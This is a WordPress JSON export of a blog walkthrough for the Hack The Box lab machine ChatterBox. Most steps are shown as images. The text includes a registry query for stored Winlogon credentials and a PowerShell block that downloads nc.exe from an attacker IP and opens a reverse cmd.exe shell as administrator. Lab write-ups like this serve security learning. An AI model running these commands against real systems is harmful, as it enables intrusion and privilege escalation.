{"id":39,"date":"2021-02-10T10:07:22","date_gmt":"2021-02-10T10:07:22","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=39"},"modified":"2021-02-10T10:12:21","modified_gmt":"2021-02-10T10:12:21","slug":"htb-chatterbox-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-chatterbox-walkthrough\/","title":{"rendered":"HTB &#8211; ChatterBox Walkthrough"},"content":{"rendered":"\n<h2>nmap<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/33t7WVV7uMNPvHcQ7R-4MlNSuUwIjB6zyw0BkiCJp74i0bL2q5FpDvD3cih1oa5RNz0b9YbGZtNnlDVSBuvPNBtx-ff30n1XaE7nJsp3uP9vQ9fQASgFJ7suncp4t1TL6-2Z-jNP\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Exploit<\/h2>\n\n\n\n<p>Create a shell with msfvenom as described in the exploit<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/4mKE2Qm5OxPvmnunnzIJShAbeBE0mNj2CMB5FwC7EkKoLl4sdCY6RP-N5udof-my5HOK7oSGzFVxR04hVAUUA-o8Sn9gQZhCiuMSaZB5nkKFbWaXFZUzwfM4l_IJqdoILt-XLcf9\" alt=\"\"\/><\/figure>\n\n\n\n<p>Get the exploit from searchsploit or exploitdb&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/aR_r9O1zAVbed5V7vt29fPOv5aKezlyDlRjwt7ysrOGeZQedrcdijdbLIeO5CwVoI71kJmtsBAFf6KDNL-nw_s7N3JSLwoIPReSZ0UGmrC-Mds1dBVFJrstXtTWC-coxuJhal_Vq\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Shell<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/uS-5wg8Nwl33SGzWuo55aa5K6hbz1aavMG7l-RT225b7XjmCsluN0cpX2EqsUo9sQUMxI4x5zbvI1JRzEE1_DuEUK6ROVP0KsHKXNRLQkqt--nEZy3cOYq8f0f8QQEM6CALtYs96\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Privilege Escalation<\/h2>\n\n\n\n<p>reg query &#8220;HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon&#8221;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/PqO88zhCdxNZHPDjvozqLljzsWs-G5y8WmSSQevGHprZME3awo4l-bencFB1kMh4NUUqibO6-95ft2MIoQXpC7F34bHG9jy0lZjugOMpdc1fiNaP7nf5j7t9iOAAH9TvutkHX96i\" alt=\"\"\/><\/figure>\n\n\n\n<p>(New-Object System.Net.WebClient).DownloadFile(&#8216;http:\/\/10.10.14.16:8000\/nc.exe&#8217;,&#8217;C:\\Users\\Alfred\\Desktop\\nc.exe&#8217;)<br>$username = &#8216;administrator&#8217;$password = &#8216;Welcome1!&#8217;<br>$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\\Users\\Alfred\\Desktop\\nc.exe -ArgumentList &#8216;-e cmd.exe 10.10.14.16 1234&#8217; -Credential $credential<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/PS3D6TdoCgIX23-qNkTxpPZjeOs-I7l8-YQGKVmxLNDzA_R-R12HrKCeAZxx0yOEoor7PgnKqesHjqV_M-IZxA9G_opy3n8-hIMhdRy1FmF_lD-Cx6t640118ktwsdE_BoK9UYg-\" alt=\"\"\/><\/figure>\n\n\n\n<p>&nbsp;And we get an admin shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/SvAtga0Lvzd0X0zP5fZpUV1lsy6lJchTE6iIKYZqFsftfI4NHXjO35UURgHoo_aguxTwCBWxD6pqZiSjON-vGgCd6xOCowaW1V0ART1RMWdetD04ccXL4xDbb0RjHEA_VrXfLKXm\" alt=\"\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>nmap Exploit Create a shell with msfvenom as described in the exploit Get the exploit from searchsploit or exploitdb&nbsp; Shell Privilege Escalation reg query &#8220;HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon&#8221; (New-Object System.Net.WebClient).DownloadFile(&#8216;http:\/\/10.10.14.16:8000\/nc.exe&#8217;,&#8217;C:\\Users\\Alfred\\Desktop\\nc.exe&#8217;)$username = &#8216;administrator&#8217;$password = &#8216;Welcome1!&#8217;$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\\Users\\Alfred\\Desktop\\nc.exe -ArgumentList &#8216;-e cmd.exe 10.10.14.16 1234&#8217; -Credential $credential &nbsp;And we get an admin&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-chatterbox-walkthrough\/\">Continue reading <span class=\"screen-reader-text\">HTB &#8211; ChatterBox Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/39"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=39"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/39\/revisions"}],"predecessor-version":[{"id":40,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/39\/revisions\/40"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=39"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=39"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}